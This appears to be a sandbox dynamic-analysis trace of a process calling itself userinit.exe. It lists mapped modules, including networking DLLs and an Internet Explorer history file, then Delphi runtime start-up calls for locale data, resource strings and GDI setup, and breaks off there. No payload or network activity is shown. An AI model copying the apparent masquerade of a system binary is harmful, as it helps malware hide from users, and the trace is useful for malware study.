filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 5411
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 5412
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 5413
start_va = 0x2a10000
end_va = 0x2a9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a10000"
filename = ""
Region:
id = 5414
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 5415
start_va = 0x2f80000
end_va = 0x311ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f80000"
filename = ""
Region:
id = 5416
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 5417
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 5418
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 5419
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 5420
start_va = 0x2f80000
end_va = 0x303ffff
entry_point = 0x2f80000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 5421
start_va = 0x30e0000
end_va = 0x311ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000030e0000"
filename = ""
Thread:
id = 281
os_tid = 0x518
[0168.230] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0168.230] GetKeyboardType (nTypeFlag=0) returned 4
[0168.230] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0168.230] GetStartupInfoA (in: lpStartupInfo=0xaf9e4 | out: lpStartupInfo=0xaf9e4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0168.230] GetVersion () returned 0x1db10106
[0168.230] GetVersion () returned 0x1db10106
[0168.230] GetCurrentThreadId () returned 0x518
[0168.230] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0xaf4e0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0168.230] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xaf3bb, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0168.230] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xaf4d0 | out: phkResult=0xaf4d0*=0x0) returned 0x2
[0168.230] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xaf4d0 | out: phkResult=0xaf4d0*=0x0) returned 0x2
[0168.230] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xaf4d0 | out: phkResult=0xaf4d0*=0x0) returned 0x2
[0168.230] lstrcpynA (in: lpString1=0xaf3bb, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0168.231] GetThreadLocale () returned 0x409
[0168.231] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0xaf4cb, cchData=5 | out: lpLCData="ENU") returned 4
[0168.231] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0168.231] lstrcpynA (in: lpString1=0xaf3d8, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0168.231] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0168.231] lstrcpynA (in: lpString1=0xaf3d8, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0168.231] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0168.232] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0168.232] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x203640
[0168.232] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1180000
[0168.232] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x204640
[0168.232] VirtualAlloc (lpAddress=0x1180000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1180000
[0168.232] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0168.232] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0168.232] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0168.232] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0168.232] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0168.232] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0168.232] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0xaf604, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0xaf5f0, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0168.233] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0xaf5f0, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0168.233] GetVersionExA (in: lpVersionInformation=0xaf988*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xaf988*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0168.233] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0168.233] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0168.233] GetThreadLocale () returned 0x409
[0168.233] GetThreadLocale () returned 0x409
[0168.233] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0xaf860, cchData=256 | out: lpLCData="Jan") returned 4
[0168.233] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0xaf860, cchData=256 | out: lpLCData="January") returned 8
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0xaf860, cchData=256 | out: lpLCData="Feb") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0xaf860, cchData=256 | out: lpLCData="February") returned 9
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0xaf860, cchData=256 | out: lpLCData="Mar") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0xaf860, cchData=256 | out: lpLCData="March") returned 6
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0xaf860, cchData=256 | out: lpLCData="Apr") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0xaf860, cchData=256 | out: lpLCData="April") returned 6
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0xaf860, cchData=256 | out: lpLCData="May") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0xaf860, cchData=256 | out: lpLCData="May") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0xaf860, cchData=256 | out: lpLCData="Jun") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0xaf860, cchData=256 | out: lpLCData="June") returned 5
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0xaf860, cchData=256 | out: lpLCData="Jul") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0xaf860, cchData=256 | out: lpLCData="July") returned 5
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0xaf860, cchData=256 | out: lpLCData="Aug") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0xaf860, cchData=256 | out: lpLCData="August") returned 7
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0xaf860, cchData=256 | out: lpLCData="Sep") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0xaf860, cchData=256 | out: lpLCData="September") returned 10
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0xaf860, cchData=256 | out: lpLCData="Oct") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0xaf860, cchData=256 | out: lpLCData="October") returned 8
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0xaf860, cchData=256 | out: lpLCData="Nov") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0xaf860, cchData=256 | out: lpLCData="November") returned 9
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0xaf860, cchData=256 | out: lpLCData="Dec") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0xaf860, cchData=256 | out: lpLCData="December") returned 9
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0xaf860, cchData=256 | out: lpLCData="Sun") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0xaf860, cchData=256 | out: lpLCData="Sunday") returned 7
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0xaf860, cchData=256 | out: lpLCData="Mon") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0xaf860, cchData=256 | out: lpLCData="Monday") returned 7
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0xaf860, cchData=256 | out: lpLCData="Tue") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0xaf860, cchData=256 | out: lpLCData="Tuesday") returned 8
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0xaf860, cchData=256 | out: lpLCData="Wed") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0xaf860, cchData=256 | out: lpLCData="Wednesday") returned 10
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0xaf860, cchData=256 | out: lpLCData="Thu") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0xaf860, cchData=256 | out: lpLCData="Thursday") returned 9
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0xaf860, cchData=256 | out: lpLCData="Fri") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0xaf860, cchData=256 | out: lpLCData="Friday") returned 7
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0xaf860, cchData=256 | out: lpLCData="Sat") returned 4
[0168.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0xaf860, cchData=256 | out: lpLCData="Saturday") returned 9
[0168.234] GetThreadLocale () returned 0x409
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0xaf8bc, cchData=256 | out: lpLCData="$") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0xaf8bc, cchData=256 | out: lpLCData="0") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0xaf8bc, cchData=256 | out: lpLCData="0") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0xaf9b4, cchData=2 | out: lpLCData=",") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0xaf9b4, cchData=2 | out: lpLCData=".") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0xaf8bc, cchData=256 | out: lpLCData="2") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0xaf9b4, cchData=2 | out: lpLCData="/") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0xaf8bc, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0168.235] GetThreadLocale () returned 0x409
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xaf888, cchData=256 | out: lpLCData="1") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0xaf8bc, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0168.235] GetThreadLocale () returned 0x409
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xaf888, cchData=256 | out: lpLCData="1") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0xaf9b4, cchData=2 | out: lpLCData=":") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0xaf8bc, cchData=256 | out: lpLCData="AM") returned 3
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0xaf8bc, cchData=256 | out: lpLCData="PM") returned 3
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0xaf8bc, cchData=256 | out: lpLCData="0") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0xaf8bc, cchData=256 | out: lpLCData="0") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0xaf8bc, cchData=256 | out: lpLCData="0") returned 2
[0168.235] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0xaf9b4, cchData=2 | out: lpLCData=",") returned 2
[0168.235] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0168.235] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0168.235] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0168.235] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0168.235] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0168.235] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0168.235] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0168.235] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0168.236] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0168.236] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0168.236] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0168.237] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0168.237] GetDC (hWnd=0x0) returned 0x1501085f
[0168.237] GetDeviceCaps (hdc=0x1501085f, index=90) returned 96
[0168.237] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0168.237] GetDC (hWnd=0x0) returned 0x1501085f
[0168.237] GetDeviceCaps (hdc=0x1501085f, index=104) returned 0
[0168.237] ReleaseDC (hWnd=0x0, hDC=0x1501085f) returned 1
[0168.237] CreatePalette (plpal=0xaf618) returned 0x2708086f
[0168.237] GetStockObject (i=7) returned 0x1b00017
[0168.237] GetStockObject (i=5) returned 0x1900015
[0168.237] GetStockObject (i=13) returned 0x18a002e
[0168.237] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0168.237] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0168.237] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0168.237] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0168.237] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0168.237] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0168.237] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0168.238] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0168.239] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0xaf614, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
